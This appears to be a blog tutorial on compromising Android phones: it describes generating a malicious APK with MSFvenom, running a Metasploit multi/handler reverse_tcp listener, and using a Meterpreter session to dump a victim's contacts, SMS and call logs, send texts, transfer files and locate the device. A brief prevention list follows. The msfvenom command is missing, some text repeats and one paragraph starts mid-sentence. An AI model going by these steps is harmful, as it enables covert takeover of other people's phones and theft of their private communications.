How Hackers Hack Android
How Hackers Hack Android
Tablets/Phones/Emulators etc using one of the most popular exploitation framework called Metasploit
Framework and MSFvenom. Here, we will use MSFvenom for generating payload and save as a .apk
file and setup listener to Metasploit framework using the multi handler. Once user/victim download and
install the malicious apk then, an attacker can easily get back session on Metasploit.
We’re going to use the latest version of Kali Linux i.e. Kali Linux 2017.1 which you can easily download it
from their official website. Kali Linux is one of the Debian-based operating systems with several tools
aimed at various information security tasks, such as Penetration Testing, Forensics, and Reverse
Engineering.
In Kali Linux, Metasploit Framework is already installed, with the help of this tool, you can even hack any
Windows/Linux Operating System too, it has inbuilt so many payloads and exploits which you can also
update by following command i.e. “msfupdate”. The process to exploit android is very simple and easy to
use.
Requirements –
1. Kali Linux 2017.1
2. USB WLAN (Wireless Adapter)
3. VMware or Virtual Box
4. An Open Port
Before to start the exploitation of android, you need to connect your Kali Linux with Wireless Network
which you are using. After a successful connection with your wireless network, note down the IP of wlan0
interface by typing this command:
Command: ifconfig wlan0
To find IP over the Internet, you can use this ad-free IP-Look tool.
Now in the first step, you need to create an android backdoor so-called as payload in the form of .apk
extension. For the creation of this payload, you can use msfvenom by typing this command:
Now we want to use a payload handler for handling our reverse TCP connection by typing this command
“use multi/handler“.
You should now have a prompt which says msf exploit(handler) >. Now set the payload for android by
typing these commands:
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.3
set LPORT 443
To verify all the things, please type “show options“. Now to start the handler, type “run” or “exploit” in the
same terminal.
app), your Meterpreter terminal should say “Meterpreter session one opened” or something of that sort.
This means you have successfully gained access to the device.
Bingo!!! We got the Meterpreter session of Android device, and we can check more details with “sysinfo”
command as mentioned in the below screenshot.
To check all running processes, type “ps -ax”.
If you want to check whether the android device is rooted or not, simply type “check_root“.
You can dump all contacts/call logs/sms by typing “dump_contacts” for dumping the contacts, “dump_sms”
for dumping all messages and “dump_calllog” for dumping all call logs.
You can dump all contacts/call logs/sms by typing “dump_contacts” for dumping the contacts, “dump_sms”
for dumping all messages and “dump_calllog” for dumping all call logs.
You can even send the sms to anyone by just typing this command send_sms -d +1234567890 -t “Your
Phone Has been Hacked“.
Here -d stands for a destination number and -t stands for SMS body text and here’s the message which
we received successfully.
After that you can even download/upload any file by typing this command “upload/download <source>
<destination>”
The default sdcard location will be /root/sdcard from where you can download any stuff from exploited
android device.
To know about more commands of meterpreter, just type run and press tab twice.
This command is to locate the longitude and latitude values of targeted android device.
There are lots of commands available in meterpreter by using “?“ help command to see more options
what we can perform with an Android device. We have successfully penetrated the Android device using
Kali Linux and penetration testing tools.
Prevention –
1. Don’t allow downloading any apps from cloud websites or fake websites.
2. Don’t install apps with unknown resources enabled option.
3. Use antivirus in a mobile device to keep an eye on every moment of mobile like Cmsecurity, M-Kavach etc.
4. Don’t click any random link while surfing the internet.
5. Never download unwanted src, doc, pdf, apk file from an unknown source.
6. Always confirm with the source pertaining to file to double sure. To verify the app, you can
use Apkpure.com.
FAQ – Frequently Asked Questions